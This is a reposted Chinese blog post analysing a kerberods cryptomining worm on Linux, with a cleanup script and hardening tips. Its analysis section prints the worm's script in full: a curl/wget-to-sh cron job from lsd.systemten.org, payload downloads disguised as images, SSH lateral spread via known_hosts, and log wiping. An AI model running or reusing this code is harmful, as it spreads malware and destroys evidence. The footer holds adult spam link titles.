<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    2. 

    <del id="afajh"><form id="afajh"></form></del>
    

    5. 

        1. <th id="afajh"><progress id="afajh"></progress></th>

          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>
          太恐怖了,Linux服務(wù)器感染了kerberods病毒...
          共
                12111字,需瀏覽
                    25分鐘
                
           ·
          2020-05-03 23:21
          

                    
          b251fd8418146ded3f37d69e92df7a05.webpcb57e8801fc567cd445830247a11b141.webp

          點(diǎn)擊「閱讀原文」查看良許原創(chuàng)精品視頻。
          作者:他二哥
          鏈接:https://www.cnblogs.com/kobexffx/p/11000337.html
          一、癥狀及表現(xiàn)

          1、CPU使用率異常,top命令顯示CPU統(tǒng)計(jì)數(shù)數(shù)據(jù)均為0,利用busybox 查看CPU占用率之后,發(fā)現(xiàn)CPU被大量占用。

          注:ls top ps等命令已經(jīng)被病毒的動(dòng)態(tài)鏈接庫(kù)劫持,無(wú)法正常使用,大家需要下載busybox。

          df80de8a41939806d4b6a6f0176b60e3.webp

          2、crontab 定時(shí)任務(wù)異常,存在以下內(nèi)容;

          6d196de123d20b87535431f329692d57.webp

          3、后期病毒變異,劫持sshd,導(dǎo)致遠(yuǎn)程登陸失敗,偶爾還會(huì)跳出定時(shí)任務(wù)失敗,收到新郵件等問(wèn)題

          d919109bdc83e0cd1a9db8af3dea4dd9.webp

          ?4、 存在異常文件、異常進(jìn)程以及異常開(kāi)機(jī)項(xiàng)

          ebe40918346bc51bf0044aab35723719.webp
          bc0ccc6175d27aed94f3b8b4323f249d.webp
          f254be53a45786d898a48b403790dda2.webp
          1cac26aa3112ea9a9f8926d33e653f7e.webp

          二、查殺方法

          1、斷網(wǎng),停止定時(shí)任務(wù)服務(wù);
          2、查殺病毒主程序,以及保護(hù)病毒的其他進(jìn)程;
          3、恢復(fù)被劫持的動(dòng)態(tài)鏈接庫(kù)和開(kāi)機(jī)服務(wù);
          4、重啟服務(wù)器和服務(wù);

          附查殺腳本(根據(jù)情況修改)
          (腳本參考(https://blog.csdn.net/u010457406/article/details/89328869))
           ?1 #!/bin/bash ?2 #可以重復(fù)執(zhí)行幾次,防止互相拉起導(dǎo)致刪除失敗3 ?4 function installBusyBox(){ ?5 ? ? #參考第一段 ?6 ? ? busybox|grep BusyBox |grep v ?7 }8 ?9 function banHosts(){ 10 ? ? #刪除免密認(rèn)證,防止繼續(xù)通過(guò)ssh進(jìn)行擴(kuò)散,后續(xù)需自行恢復(fù),可不執(zhí)行 11 ? ? busybox echo "" > /root/.ssh/authorized_keys 12 ? ? busybox echo "" > /root/.ssh/id_rsa 13 ? ? busybox echo "" > /root/.ssh/id_rsa.pub 14 ? ? busybox echo "" > /root/.ssh/known_hosts 15 ? ? #busybox echo "" > /root/.ssh/auth 16 ? ? #iptables -I INPUT -p tcp --dport 445 -j DROP 17 ? ? busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org" >> /etc/hosts 18 }1920 21 function fixCron(){ 22 ? ? #修復(fù)crontab 23 ? ? busybox chattr -i ?/etc/cron.d/root ?2>/dev/null 24 ? ? busybox rm -f /etc/cron.d/root 25 ? ? busybox chattr -i /var/spool/cron/root ?2>/dev/null 26 ? ? busybox rm -f /var/spool/cron/root 27 ? ? busybox chattr -i /var/spool/cron/tomcat ?2>/dev/null 28 ? ? busybox rm -f /var/spool/cron/tomcat 29 ? ? busybox chattr -i /var/spool/cron/crontabs/root ?2>/dev/null 30 ? ? busybox rm -f /var/spool/cron/crontabs/root 31 ? ? busybox rm -rf /var/spool/cron/tmp.* 32 ? ? busybox rm -rf /var/spool/cron/crontabs 33 ? ? busybox touch /var/spool/cron/root 34 ? ? busybox chattr +i /var/spool/cron/root 35 }36 37 function killProcess(){ 38 ? ? #修復(fù)異常進(jìn)程 39 ? ? #busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 40 ? ? #busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 41 ? ? #busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 42 ? ? #busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 43 ? ? #busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 44 ? ? busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 45 ? ? busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 46 ? ? busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/kauditds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 47 ? ? busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 ?2>/dev/null 48 ? ? busybox rm -f /tmp/khugepageds 49 ? ? busybox rm -f /tmp/migrationds  50 ? ? busybox rm -f /tmp/sshd  51 ? ? busybox rm -f /tmp/kauditds 52 ? ? busybox rm -f /tmp/migrationds 53 ? ? busybox rm -f /usr/sbin/sshd 54 ? ? busybox rm -f /usr/sbin/kerberods 55 ? ? busybox rm -f /usr/sbin/kthrotlds 56 ? ? busybox rm -f /usr/sbin/kintegrityds 57 ? ? busybox rm -f /usr/sbin/kpsmouseds 58 ? ? busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf 59 }6061 62 function clearLib(){ 63 ? ? #修復(fù)動(dòng)態(tài)庫(kù) 64 ? ? busybox chattr -i /etc/ld.so.preload 65 ? ? busybox rm -f /etc/ld.so.preload 66 ? ? busybox rm -f /usr/local/lib/libcryptod.so 67 ? ? busybox rm -f /usr/local/lib/libcset.so 68 ? ? busybox chattr -i /etc/ld.so.preload 2>/dev/null 69 ? ? busybox chattr -i /usr/local/lib/libcryptod.so ?2>/dev/null 70 ? ? busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null 71 ? ? busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf 72 ? ? busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf 73 ? ? busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf 74 ? ? busybox rm -f /etc/ld.so.cache 75 ? ? busybox rm -f /etc/ld.so.preload 76 ? ? busybox rm -f /usr/local/lib/libcryptod.so 77 ? ? busybox rm -f /usr/local/lib/libcset.so 78 ? ? busybox rm -rf /usr/local/lib/libdevmapped.so 79 ? ? busybox rm -rf /usr/local/lib/libpamcd.so  80 ? ? busybox rm -rf /usr/local/lib/libdevmapped.so 81 ? ? busybox touch /etc/ld.so.preload 82 ? ? busybox chattr +i /etc/ld.so.preload 83 ? ? ldconfig 84 }85 86 function clearInit(){ 87 ? ? #修復(fù)異常開(kāi)機(jī)項(xiàng) 88 ? ? #chkconfig netdns off 2>/dev/null 89 ? ? #chkconfig –del netdns 2>/dev/null 90 ? ? #systemctl disable netdns 2>/dev/null 91 ? ? busybox rm -f /etc/rc.d/init.d/kerberods 92 ? ? busybox rm -f /etc/init.d/netdns 93 ? ? busybox rm -f /etc/rc.d/init.d/kthrotlds 94 ? ? busybox rm -f /etc/rc.d/init.d/kpsmouseds 95 ? ? busybox rm -f /etc/rc.d/init.d/kintegrityds 96 ? ? busybox rm -f /etc/rc3.d/S99netdns 97 ? ? #chkconfig watchdogs off 2>/dev/null 98 ? ? #chkconfig --del watchdogs 2>/dev/null 99 ? ? #chkconfig --del kworker 2>/dev/null100 ? ? #chkconfig --del netdns 2>/dev/null101 }102103 function recoverOk(){104 ? ? service crond start105 ? ? busybox sleep 3106 ? ? busybox chattr -i /var/spool/cron/root107 ? ? # 將殺毒進(jìn)程加入到定時(shí)任務(wù)中,多次殺毒108 ? ? echo "*/10 * * * * /root/kerberods_kill.sh" | crontab -109 ? ? # 恢復(fù)被劫持的sshd 服務(wù)110 ? ? #busybox cp ~/sshd_new /usr/sbin/sshd 111 ? ? #service sshd restart 112 ? ? echo "OK,BETTER REBOOT YOUR DEVICE"113 }114115 #先停止crontab服務(wù)116 echo "1| stop crondtab service!"117 service crond stop118 #防止病毒繼續(xù)擴(kuò)散119 echo "2| banHosts!"120 banHosts121 #清除lib劫持122 echo "3| clearLib!"123 clearLib124 #修復(fù)crontab125 echo "4| fixCron!"126 fixCron127 #清理病毒進(jìn)程128 echo "5| killProcess!"129 killProcess130 #刪除異常開(kāi)機(jī)項(xiàng)131 echo "6| clearInit! "132 clearInit133 #重啟服務(wù)和系統(tǒng)134 echo "7| recover!"135 recoverOk

          查殺完成以后重啟服務(wù)器,發(fā)現(xiàn)過(guò)段時(shí)間,登陸主機(jī),無(wú)論本地還是ssh遠(yuǎn)程登陸,依然會(huì)有病毒進(jìn)程被拉起,觀察top里面的進(jìn)程,并用pstree 回溯進(jìn)程之間的關(guān)系,發(fā)現(xiàn)每次用戶登陸就會(huì)有病毒進(jìn)程被拉起,懷疑登陸時(shí)加載文件存在問(wèn)題,逐個(gè)排查下列文件:

          • /etc/profile,
          • ~/.profile,
          • ~/.bash_login,
          • ~/.bash_profile,
          • ~/.bashrc,
          • /etc/bashrc;

          最后終于發(fā)現(xiàn)/etc/bashrc 文件被加入了一些似曾相識(shí)的語(yǔ)句

          294a5b78096feff1608c6acf33473d5f.webp

          刪除并次查殺病毒(重復(fù)之前查殺步驟),重啟服務(wù)器,觀察一段時(shí)間后不再有病毒程序被拉起,至此病毒被查殺完全。

          三、病毒分析

          1、感染路徑

          • 攻擊者通過(guò)網(wǎng)絡(luò)進(jìn)入第一臺(tái)被感染的機(jī)器(redis未認(rèn)證漏洞、ssh密碼暴力破解登錄等)。

          • 第一臺(tái)感染的機(jī)器會(huì)讀取known_hosts文件,遍歷ssh登錄,如果是做了免密登錄認(rèn)證,則將直接進(jìn)行橫向傳播。

          2、病毒主要模塊

          • 主惡意程序:kerberods
          • 惡意Hook庫(kù):libcryptod.so libcryptod.c
          • 挖礦程序:khugepageds
          • 惡意腳本文件:netdns (用作kerberods的啟停等管理)
          • 惡意程序:sshd (劫持sshd服務(wù),每次登陸均可拉起病毒進(jìn)程)

          3、執(zhí)行順序

          ① 執(zhí)行惡意腳本下載命令

          d919109bdc83e0cd1a9db8af3dea4dd9.webp

          ② 主進(jìn)程操作

          1> 添加至開(kāi)機(jī)啟動(dòng),以及/etc/bashrc?
          2> 生成了sshd文件 劫持sshd服務(wù)
          3> 將netdns文件設(shè)置為開(kāi)機(jī)啟動(dòng)
          4> 編譯libcryptod.c為/usr/local/lib/libcryptod.so
          5> 預(yù)加載動(dòng)態(tài)鏈接庫(kù),惡意hook關(guān)鍵系統(tǒng)操作函數(shù)
          6> 修改/etc/cron.d/root文件,增加定時(shí)任務(wù)
          7> 拉起khugepageds挖礦進(jìn)程

          附病毒惡意進(jìn)程代碼

           1 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin 2  3 mkdir -p /tmp 4 chmod 1777 /tmp5 6 echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab -7 8 ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -910 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -911 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -912 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -913 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -914 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -915 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -916 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -917 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -918 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -919 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -920 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -921 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -922 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -923 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -924 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -925 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -926 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -927 ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -928 ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -929 ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -930 ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -931 ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -932 ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -93334 cd /tmp35 touch /usr/local/bin/writeable && cd /usr/local/bin/36 touch /usr/libexec/writeable && cd /usr/libexec/37 touch /usr/bin/writeable && cd /usr/bin/38 rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable39 export PATH=$PATH:$(pwd)40 if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then41 ? ? chattr -i sshd42 ? ? rm -rf sshd43 ? ? ARCH=$(uname -m)44 ? ? if [ ${ARCH}x = "x86_64x" ]; then45 ? ? ? ? (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd46 ? ? else47 ? ? ? ? (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd48 ? ? fi49 ? ? ? ? $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd50 fi5152 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then53 ? for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done54 fi5556 for file in /home/*57 do58 ? ? if test -d $file59 ? ? then60 ? ? ? ? if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then61 ? ? ? ? ? ? for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done62 ? ? ? ? fi63 ? ? fi64 done6566 echo 0>/var/spool/mail/root67 echo 0>/var/log/wtmp68 echo 0>/var/log/secure69 echo 0>/var/log/cron70 #

          四、安全防護(hù)

          1.SSH

          ① 謹(jǐn)慎做免密登錄
          ② 盡量不使用默認(rèn)的22端口
          ③ 增強(qiáng)root密碼強(qiáng)度

          2.Redis

          ① 增加授權(quán)認(rèn)證(requirepass參數(shù))
          ② 盡量使用docker版本(docker pull redis)
          ③ 隱藏重要的命令


          --END--

          本公眾號(hào)全部博文已整理成一個(gè)目錄,請(qǐng)?jiān)诠娞?hào)里回復(fù)「m」獲取!
          推薦閱讀:
          你一定聽(tīng)過(guò)這些不太標(biāo)準(zhǔn)的技術(shù)圈發(fā)音...
          讀者突破100000啦~(專屬福利不可少!)
          「多人運(yùn)動(dòng)」的思考:如何限制他人操作自己的電腦?

          5T技術(shù)資源大放送!包括但不限于:C/C++,Linux,Python,Java,PHP,人工智能,單片機(jī),樹(shù)莓派,等等。在公眾號(hào)內(nèi)回復(fù)「1024」,即可免費(fèi)獲?。?!

          瀏覽
                    82
          點(diǎn)贊
    
          評(píng)論
    
          收藏
    
          分享
        
          手機(jī)掃一掃分享
          分享
    
          
        舉報(bào)
    
          評(píng)論
          圖片
          表情
          推薦
        
          點(diǎn)贊
    
          評(píng)論
    
          收藏
    
          分享
        
          手機(jī)掃一掃分享
          分享
    
          
        舉報(bào)
    
          

          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            2. 

            <del id="afajh"><form id="afajh"></form></del>
            

            5. 

                1. <th id="afajh"><progress id="afajh"></progress></th>

                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  

成人国产精品秘 久久久网站
|
国产精品秘 国产A级
|
a片一级富二代表兄妹淫乱新春
|
波多野结衣中文字幕一区
|
一级黄色影片
|